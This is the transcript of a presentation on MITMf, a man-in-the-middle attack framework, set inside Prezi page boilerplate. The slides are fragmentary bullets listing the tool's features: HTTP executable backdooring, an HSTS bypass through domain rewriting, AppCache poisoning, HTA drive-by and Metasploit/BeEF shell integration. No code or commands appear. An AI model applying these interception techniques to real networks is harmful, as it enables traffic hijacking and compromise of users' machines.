Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
MITMf: Bringing Man-In-The-Middle attacks to the 21’st century
Transcript of MITMf: Bringing Man-In-The-Middle attacks to the 21’st century
Bringing Man-In-The-Middle attacks to the 21’st century
Contributed to the Veil-Framework, Kali-Nethunter, Responder, Impacket and more...
How did this get started?
I feel your pain bro...
Created by Ben Schmidt (@_supernothing)
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
So problem solved right?
Well not really...
Who the hell is Sergio??
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (FAIL!)
BeEF and Metasploit integration via their respective API and RPC
Learn from other projects mistakes!
HTA Drive by
Written by @rubenthijssen
Replaces strings in HTML content
Let's pause for a moment too understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently backdoor executables going over HTTP
You can check out BDFactory at:
The plugin uses code from BDFproxy:
Uses Leonardo Nve's technique for partially bypassing HSTS
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz (@kkotowicz) response tampering attacks
Gahhh! Vodoo?? No...
Returns redirect to
DNS request gets intercepted and
is mirrored to
We then re-write all links to the alternate domain
Client continues in plain-text since browser has no HSTS setting for
Dan McInerney's (@DanHMcInerney)
Buy him a drink!
But dude! I want some shells <3
I got you covered!
Looking into the crystal ball...
Port everything over to mitmproxy
Make everything less 'hacky'
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Soooo.. How does this thing work?
Here we go... May the demo gods be with me...
The configuration file
If you're more of a Ruby person
Check bettercap out
Really awesome project by @evilsocket
Takes screenshots of clients browsers using HTML5 canvas
What it turned out to be...
A combination of the best features of 7+ tools all hacked to work together:
AppCache Poison SSLstrip Mod
Some JS from Metasploit